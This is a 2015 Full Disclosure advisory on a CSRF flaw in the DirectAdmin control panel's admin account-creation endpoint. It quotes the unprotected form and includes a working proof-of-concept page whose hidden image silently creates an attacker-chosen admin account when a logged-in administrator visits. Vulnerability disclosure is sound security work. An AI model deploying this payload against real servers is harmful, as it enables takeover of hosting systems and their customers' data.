
[FD] DirectAdmin (1.44.3) CSRF Vulnerability



# Title : DirectAdmin (1.44.3) CSRF Vulnerability
# Date : 10-10-2015
# Version : 1.43.3-1.44.3
# Author : @babayarisi http://ha.cker.io
# Vendor : http://www.directadmin.com/
# Download: http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a web-based hosting control panel.

# As the original markup below shows, the account-creation form (CMD_ACCOUNT_ADMIN with action=create) carries no CSRF protection: there is no secret per-session token, so the request is authenticated by the session cookie alone, and any page a logged-in administrator visits can submit it on their behalf.

<form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" onSubmit="return formOK()">
<input type=hidden name=action value=create>
<tr><td class="list">Username:</td><td class="list"><input type=text name=username maxlength=12 onChange="checkName()"></td></tr>
<tr><td class="list">E-Mail:</td><td class="list"><input type=text name=email onChange="checkEmail()"></td></tr>
<tr><td class="list">Enter Password:</td><td class="list"><input type=password name=passwd> <input type=button value="Random" onClick="randomPass()"></td></tr>
<tr><td class="list">Re-Enter Password:</td><td class="list"><input type=password name=passwd2 onChange="checkPass()"></td></tr>
<tr><td class="list">Send Email Notification:</td><td class="list"><input type=checkbox value="yes" name=notify checked> <a href="javascript:showAdminMessage();">Edit Admin Message</a></td></tr>

<tr><td td class="listtitle" colspan=3 align=right>
<input type=submit value="Submit">
</td></tr>
</form>

# POC
# The page below, when opened by a victim who is logged in to DirectAdmin as an administrator on the target host (port 2222), loads a hidden image whose URL carries the same parameters as the form, in the query string. The browser attaches the victim's session cookie to that request, so the account is created with no user interaction. The PoC relies on two things: the endpoint accepting its parameters from a GET query string rather than only the POST body of the form, and the browser sending the session cookie with a cross-site image request.

<html>
<head>
<title>POC</title>
<script type="text/javascript">
// Build the account-creation URL and load it through a hidden <img>, so the
// victim's browser issues a GET to DirectAdmin with its session cookie attached.
function yurudi(){
  var adress ="www.demo.com";      // target DirectAdmin host (demo value)
  var username="demo";             // account the attacker wants created
  var email ="demo@xxxxxxxx";
  var password="12345";
  var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;
  document.getElementById("resim").src=urlson;
}
</script>
</head>
<body onload="yurudi()">
<img id="resim" src="" style="height:0px;width:0px;">
</body>
</html>
# POC

# don't be evil!
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/